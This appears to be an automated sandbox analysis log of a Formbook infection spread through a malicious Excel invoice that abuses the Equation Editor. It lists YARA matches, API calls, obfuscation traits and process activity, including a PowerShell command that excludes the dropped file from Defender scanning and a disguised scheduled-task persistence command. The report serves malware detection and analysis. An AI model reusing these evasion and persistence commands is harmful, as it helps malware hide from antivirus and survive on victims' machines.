Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A8373B appears 238 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A83F92 appears 108 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A3E2A8 appears 38 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00AAF970 appears 81 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00A3DF5C appears 118 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00CA3F92 appears 116 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00CA373B appears 228 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00C5E2A8 appears 59 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00CCF970 appears 80 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00C5DF5C appears 117 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 9_2_004185E0 NtCreateFile, 9_2_004185E0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00418690 NtReadFile, 9_2_00418690
Source: C:\Users\Public\vbc.exe Code function: 9_2_00418710 NtClose, 9_2_00418710
Source: C:\Users\Public\vbc.exe Code function: 9_2_004187C0 NtAllocateVirtualMemory, 9_2_004187C0
Source: C:\Users\Public\vbc.exe Code function: 9_2_004187C2 NtAllocateVirtualMemory, 9_2_004187C2
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C500C4 NtCreateFile,LdrInitializeThunk, 9_2_00C500C4
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C50048 NtProtectVirtualMemory,LdrInitializeThunk, 9_2_00C50048
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C50078 NtResumeThread,LdrInitializeThunk, 9_2_00C50078
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C507AC NtCreateMutant,LdrInitializeThunk, 9_2_00C507AC
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4F9F0 NtClose,LdrInitializeThunk, 9_2_00C4F9F0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4F900 NtReadFile,LdrInitializeThunk, 9_2_00C4F900
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_00C4FAD0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_00C4FAE8
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_00C4FBB8
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_00C4FB68
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FC90 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_00C4FC90
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_00C4FC60
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_00C4FDC0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FD8C NtDelayExecution,LdrInitializeThunk, 9_2_00C4FD8C
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_00C4FED0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FEA0 NtReadVirtualMemory,LdrInitializeThunk, 9_2_00C4FEA0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FFB4 NtCreateSection,LdrInitializeThunk, 9_2_00C4FFB4
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C510D0 NtOpenProcessToken, 9_2_00C510D0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C50060 NtQuerySection, 9_2_00C50060
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C501D4 NtSetValueKey, 9_2_00C501D4
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C51148 NtOpenThread, 9_2_00C51148
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C5010C NtOpenDirectoryObject, 9_2_00C5010C
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4F8CC NtWaitForSingleObject, 9_2_00C4F8CC
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C51930 NtSetContextThread, 9_2_00C51930
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4F938 NtWriteFile, 9_2_00C4F938
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FAB8 NtQueryValueKey, 9_2_00C4FAB8
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FA50 NtEnumerateValueKey, 9_2_00C4FA50
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FA20 NtQueryInformationFile, 9_2_00C4FA20
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FBE8 NtQueryVirtualMemory, 9_2_00C4FBE8
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FB50 NtCreateKey, 9_2_00C4FB50
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C50C40 NtGetContextThread, 9_2_00C50C40
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FC48 NtSetInformationFile, 9_2_00C4FC48
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FC30 NtOpenProcess, 9_2_00C4FC30
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C51D80 NtSuspendThread, 9_2_00C51D80
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C4FD5C NtEnumerateKey, 9_2_00C4FD5C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A300C4 NtCreateFile,LdrInitializeThunk, 12_2_00A300C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A307AC NtCreateMutant,LdrInitializeThunk, 12_2_00A307AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2F9F0 NtClose,LdrInitializeThunk, 12_2_00A2F9F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2F900 NtReadFile,LdrInitializeThunk, 12_2_00A2F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FAB8 NtQueryValueKey,LdrInitializeThunk, 12_2_00A2FAB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FAE8 NtQueryInformationProcess,LdrInitializeThunk, 12_2_00A2FAE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 12_2_00A2FAD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FBB8 NtQueryInformationToken,LdrInitializeThunk, 12_2_00A2FBB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FB68 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_00A2FB68
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FB50 NtCreateKey,LdrInitializeThunk, 12_2_00A2FB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FC60 NtMapViewOfSection,LdrInitializeThunk, 12_2_00A2FC60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FD8C NtDelayExecution,LdrInitializeThunk, 12_2_00A2FD8C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FDC0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_00A2FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 12_2_00A2FED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FFB4 NtCreateSection,LdrInitializeThunk, 12_2_00A2FFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A310D0 NtOpenProcessToken, 12_2_00A310D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A30060 NtQuerySection, 12_2_00A30060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A30078 NtResumeThread, 12_2_00A30078
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A30048 NtProtectVirtualMemory, 12_2_00A30048
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A301D4 NtSetValueKey, 12_2_00A301D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A3010C NtOpenDirectoryObject, 12_2_00A3010C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A31148 NtOpenThread, 12_2_00A31148
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2F8CC NtWaitForSingleObject, 12_2_00A2F8CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A31930 NtSetContextThread, 12_2_00A31930
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2F938 NtWriteFile, 12_2_00A2F938
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FA20 NtQueryInformationFile, 12_2_00A2FA20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FA50 NtEnumerateValueKey, 12_2_00A2FA50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FBE8 NtQueryVirtualMemory, 12_2_00A2FBE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FC90 NtUnmapViewOfSection, 12_2_00A2FC90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FC30 NtOpenProcess, 12_2_00A2FC30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A30C40 NtGetContextThread, 12_2_00A30C40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FC48 NtSetInformationFile, 12_2_00A2FC48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A31D80 NtSuspendThread, 12_2_00A31D80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FD5C NtEnumerateKey, 12_2_00A2FD5C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FEA0 NtReadVirtualMemory, 12_2_00A2FEA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FE24 NtWriteVirtualMemory, 12_2_00A2FE24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FFFC NtCreateProcessEx, 12_2_00A2FFFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A2FF34 NtQueueApcThread, 12_2_00A2FF34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_000985E0 NtCreateFile, 12_2_000985E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00098690 NtReadFile, 12_2_00098690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00098710 NtClose, 12_2_00098710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_000987C0 NtAllocateVirtualMemory, 12_2_000987C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_000987C2 NtAllocateVirtualMemory, 12_2_000987C2
Source: vbc[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: nLOlOTZpUHFzC.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PROFORMA INVOICE.xlsx Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@12/26@7/6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: PROFORMA INVOICE.xlsx ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#...............(.P.............$.......x.......).......................0.......#....................................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#...............(.P.............$.......x.......D.......................0.......#.......x............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ......................../...............(.P.............$.......x.......u.......................0......./.......................(............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ......................../...............(.P.............$.......x...............................0......./.......x............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................;...............(.P.............$.......................................0.......;...............|.......(............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................;...............(.P.............$.......................................0.......;.......x............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......x.......".......(............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................G...............(.P.............$.......................................0.......G.......x...............(............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................S...............(.P.............$...............D.......................0.......S.......................(............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................S...............(.P.............$..............._.......................0.......S.......x............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................_.......U.H.F.z.C...e.x.e.......$.......................................0......._.......x...............(............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................_...............(.P.............$.......................................0......._.......x...............(............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................k...............(.P.............$.......................................0.......k.......................(............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................k...............(.P.............$.......................................0.......k.......x............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.......2.......(............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................w...............(.P.............$...............(.......................0.......w.......x...............(............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............$...............P.......................0.......................l.......(............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............$...............o.......................0...............x............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P.............$.......T...............................0...............x...............(............... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............$.......T...............................0...............x...............(............... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................ .......................(.P.............<....................................................................................... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nLOlOTZpUHFzC.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nLOlOTZpUHFzC" /XML "C:\Users\user\AppData\Local\Temp\tmp5580.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD029.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: vbc.exe String found in binary or memory: /SecurityExcepti;component/views/addbook.xaml
Source: vbc.exe String found in binary or memory: views/addcustomer.baml
Source: vbc.exe String found in binary or memory: views/addbook.baml
Source: vbc.exe String found in binary or memory: /SecurityExcepti;component/views/addcustomer.xaml
Source: vbc.exe String found in binary or memory: /SecurityExcepti;component/views/addbook.xaml
Source: vbc.exe String found in binary or memory: views/addcustomer.baml
Source: vbc.exe String found in binary or memory: views/addbook.baml
Source: vbc.exe String found in binary or memory: /SecurityExcepti;component/views/addcustomer.xaml
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000003.462674322.0000000000910000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.461677984.00000000007B0000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.495648156.0000000000DC0000.00000040.00000001.sdmp, vbc.exe, 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, svchost.exe, 0000000C.00000003.495116287.00000000002A0000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.495983916.00000000004E0000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.661157510.0000000000BA0000.00000040.00000001.sdmp
Source: Binary string: svchost.pdb source: vbc.exe, 00000009.00000002.495309971.00000000006D9000.00000004.00000020.sdmp, vbc.exe, 00000009.00000002.495142826.0000000000030000.00000040.00020000.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: vbc[1].exe.2.dr, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.2.dr, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: nLOlOTZpUHFzC.exe.4.dr, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.bb0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.bb0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.2.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.8.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.6.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.4.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.10.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.vbc.exe.bb0000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.0.vbc.exe.bb0000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00BB92F5 push ds; ret 4_2_00BB9340
Source: C:\Users\Public\vbc.exe Code function: 4_2_00BB9361 push ds; retf 4_2_00BB9364
Source: C:\Users\Public\vbc.exe Code function: 4_2_00BB9347 push ds; ret 4_2_00BB934C
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041B832 push eax; ret 9_2_0041B838
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041B83B push eax; ret 9_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041B89C push eax; ret 9_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 9_2_00406907 push 00000060h; retf 9_2_0040691C
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041A11B push ecx; ret 9_2_0041A11C
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041A3BA pushfd ; ret 9_2_0041A3BB
Source: C:\Users\Public\vbc.exe Code function: 9_2_004154EE pushad ; retf 9_2_004154F0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00419E43 push 0000007Eh; iretd 9_2_00419E45
Source: C:\Users\Public\vbc.exe Code function: 9_2_0040EFC6 push cs; ret 9_2_0040EFCC
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041B7E5 push eax; ret 9_2_0041B838
Source: C:\Users\Public\vbc.exe Code function: 9_2_00BB92F5 push ds; ret 9_2_00BB9340
Source: C:\Users\Public\vbc.exe Code function: 9_2_00BB9361 push ds; retf 9_2_00BB9364
Source: C:\Users\Public\vbc.exe Code function: 9_2_00BB9347 push ds; ret 9_2_00BB934C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A3DFA1 push ecx; ret 12_2_00A3DFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009A11B push ecx; ret 12_2_0009A11C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009A3BA pushfd ; ret 12_2_0009A3BB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_000954EE pushad ; retf 12_2_000954F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009B7E5 push eax; ret 12_2_0009B838
